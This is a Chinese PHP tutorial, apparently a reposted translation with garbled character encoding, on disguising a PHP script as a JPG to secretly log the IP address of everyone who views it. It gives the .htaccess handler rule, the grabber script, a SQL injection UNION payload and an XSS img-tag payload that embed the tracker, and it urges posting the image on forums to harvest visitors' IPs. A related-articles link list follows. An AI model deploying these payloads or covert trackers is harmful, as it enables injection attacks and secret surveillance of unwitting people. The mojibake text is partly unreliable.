基于PHP實(shí)現(xiàn)通過(guò)照片獲取ip地址
在本教程中,我們將學(xué)習(xí)如何用一張照片來(lái)盜取ip地址。我的想法是通過(guò)修改.htaccess文件,將jpg文件當(dāng)作php文件來(lái)解析。
下面就是我們需要向.htaccess中添加的代碼:
AddHandler application/x-httpd-php5 .jpg
然后將下面的代碼復(fù)制到記事本中,命名為grabber.jpg
<?php $fh = fopen(‘ip_list.txt', ‘a(chǎn)'); fwrite($fh, $_SERVER[‘REMOTE_ADDR'].” “); fclose($fh); $im = imagecreatefromjpeg(“n00b.png”); header(‘Content-Type: image/jpeg'); imagejpeg($im); imagedestroy($im); ?>
將grabber.jpg的權(quán)限設(shè)置為755,然后再找一張照片,將其命名為n00b.png,接著放到與grabber.jpg相同的目錄之中。
就這樣,一切工作就緒了。當(dāng)別人瀏覽grabber.jpg這張照片的時(shí)候,他的ip地址就會(huì)被記錄下來(lái)。
(譯者注:需要把這些東西上傳至我們的個(gè)人網(wǎng)站空間中)
POC:
(譯者注:作者這里貼了一張可獲取ip的演示照片,為了大家的隱私,我沒(méi)有將其貼出,讀者可自行去作者博客查看)
至此,我們的照片已經(jīng)可以開(kāi)始工作了。
接著我還想說(shuō)明一下如何使用SQLi來(lái)獲取ip地址。其實(shí)使用照片來(lái)盜取ip地址十分快捷,我們沒(méi)有理由去使用SQLi這種方法,但是為了讓讀者獲取到更多的知識(shí),我還是說(shuō)明一下吧:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1′ union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#
現(xiàn)在,再說(shuō)一下如何使用xss來(lái)獲取ip地址:
http://leettime.net/xsslab1/chalg1.php?name=<img src=”http://leettime.net/idiots_test_lab/imageip/tryme.jpg”>&submit=Search
好了,就是這些了。
我們可以用這個(gè)技巧做許多有趣的事情,事實(shí)上大部分社區(qū)都允許我們發(fā)布一些照片,所以我們可以用這個(gè)方法去獲取所有訪問(wèn)到我們照片的人的ip地址。
以上所述是小編給大家介紹的基于PHP實(shí)現(xiàn)通過(guò)照片獲取ip地址的相關(guān)內(nèi)容,希望對(duì)大家有所幫助!
- php產(chǎn)生隨機(jī)數(shù)的兩種方法實(shí)例代碼 輸出隨機(jī)IP
- php進(jìn)行ip地址掩碼運(yùn)算處理的方法
- PHP獲取用戶訪問(wèn)IP地址的5種方法
- PHP實(shí)現(xiàn)的限制IP投票程序IP來(lái)源分析
- php獲取本機(jī)真實(shí)IP地址實(shí)例代碼
- php求一個(gè)網(wǎng)段開(kāi)始與結(jié)束IP地址的方法
- PHP 獲取ip地址代碼匯總
- php獲取訪問(wèn)者IP地址匯總
- php限制ip地址范圍的方法
- php隱藏IP地址后兩位顯示為星號(hào)的方法
- php中獲取主機(jī)名、協(xié)議及IP地址的方法
- PHP實(shí)現(xiàn)的隨機(jī)IP函數(shù)【國(guó)內(nèi)IP段】
相關(guān)文章
php實(shí)現(xiàn)文本數(shù)據(jù)導(dǎo)入SQL SERVER
php將文本文件導(dǎo)入mysql我們經(jīng)常遇到,但是如果是導(dǎo)入到sqlserver又應(yīng)該如何操作呢,下面就給大家分享一下本人的操作方法,感覺(jué)效率還不錯(cuò),這里推薦給大家。2015-05-05PHP使用opendir和readdir函數(shù)讀取指定目錄下所有文件
這篇文章主要介紹了PHP使用opendir和readdir函數(shù)讀取指定目錄下所有文件實(shí)現(xiàn)示例詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2023-08-08php 使用curl模擬登錄人人(校內(nèi))網(wǎng)的簡(jiǎn)單實(shí)例
下面小編就為大家?guī)?lái)一篇php 使用curl模擬登錄人人(校內(nèi))網(wǎng)的簡(jiǎn)單實(shí)例。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2016-06-06一個(gè)php Mysql類(lèi) 可以參考學(xué)習(xí)熟悉下
慢慢研究吧,非常適合學(xué)習(xí)的php數(shù)據(jù)庫(kù)(mysql)類(lèi),也可以拿來(lái)直接就用,稍微熟悉一下就可以啦!2009-06-06Laravel 類(lèi)和接口注入相關(guān)的代碼
今天小編就為大家分享一篇Laravel 類(lèi)和接口注入相關(guān)的代碼,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧2019-10-10php計(jì)算程序運(yùn)行時(shí)間的簡(jiǎn)單例子分享
這篇文章主要介紹了php計(jì)算程序運(yùn)行時(shí)間的簡(jiǎn)單例子分享,需要的朋友可以參考下2014-05-05Yii2表單事件之Ajax提交實(shí)現(xiàn)方法
這篇文章主要介紹了Yii2表單事件之Ajax提交實(shí)現(xiàn)方法,結(jié)合實(shí)例形式分析了Yii2框架中ajax提交的具體實(shí)現(xiàn)技巧,需要的朋友可以參考下2017-05-05PHP水印類(lèi),支持添加圖片、文字、填充顏色區(qū)域的實(shí)現(xiàn)
下面小編就為大家?guī)?lái)一篇PHP水印類(lèi),支持添加圖片、文字、填充顏色區(qū)域的實(shí)現(xiàn)。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2017-02-02yii2.0實(shí)現(xiàn)pathinfo的形式訪問(wèn)的配置方法
這篇文章主要介紹了yii2.0實(shí)現(xiàn)pathinfo的形式訪問(wèn)的配置方法的相關(guān)資料,需要的朋友可以參考下2016-04-04